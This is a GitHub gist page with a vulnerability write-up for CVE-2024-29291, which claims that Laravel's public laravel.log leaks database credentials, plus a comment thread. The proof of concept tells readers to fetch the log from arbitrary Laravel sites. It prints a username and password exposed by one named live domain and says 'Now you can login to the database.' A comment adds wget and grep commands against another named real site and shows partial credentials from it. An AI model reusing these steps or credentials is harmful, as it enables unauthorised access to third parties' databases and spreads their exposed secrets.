Last active
June 4, 2024 14:15
-
-
Save whiteman007/43bd7fa1fa0e47554b33f0cf93066784 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-ID: CVE-2024-29291 | |
Description: | |
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials. | |
Additional Information: | |
None. | |
Risk: | |
High. | |
Vulnerability Type: | |
Database credential leak vulnerability. | |
Vendor of Product: | |
Laravel Framework. | |
Affected Product Code Base: | |
Laravel FRAMEWORK - 8.* - 11.* | |
Affected Component: | |
laravel.log. | |
Attack Type: | |
Remote. | |
Impact Information Disclosure: | |
True. | |
Attack Vectors: | |
Database credential leak vulnerability. | |
Description: | |
Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved. | |
Proof of concept: | |
Go to any Laravel-based website and navigate to storage/logs/laravel.log. | |
Open the file and search for "PDO->__construct('mysql:host=". | |
The result: | |
shell | |
Copy code | |
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) | |
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) | |
Credentials: | |
Username: u429384055_jscv | |
Password: Jaly$$a0p0p0p0 | |
Host: sql1... | |
Now you can login to the database. | |
By: Huseein Amer | |
Facebook: https://www.facebook.com/hussein.amer.75491/ | |
Read this documentation https://laravel.com/docs/11.x/filesystem#the-public-disk
it says "The public disk included in your application's filesystems configuration file is intended for files that are going to be publicly accessible. By default, the public disk uses the local driver and stores its files in storage/app/public
"
Thus storage/logs should not be accessible.
The Connector class could make use of the SensitiveParameter attribute. Seems appropriate
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
mr Jelle-SamsonIT
Connection data can be displayed even if the .env file cannot be read by an attacker. It is enough just to have the ability to read the log file.
As on the site
https://www.digo.sa/.env
It shows you that 403
Forbidden
Cannot display data from env file
Go
https://www.digo.sa/storage/logs/laravel.log
Write it down
wget https://www.digo.sa/storage/logs/laravel.log
and
grep host laravel.log
and you can now show
'mysql:host=127....', 'africansc_afric...', 'TYumh2rsJ0WP7Qe...'
As for the eligibility to grant CVE, mitre.org has classified it as high risk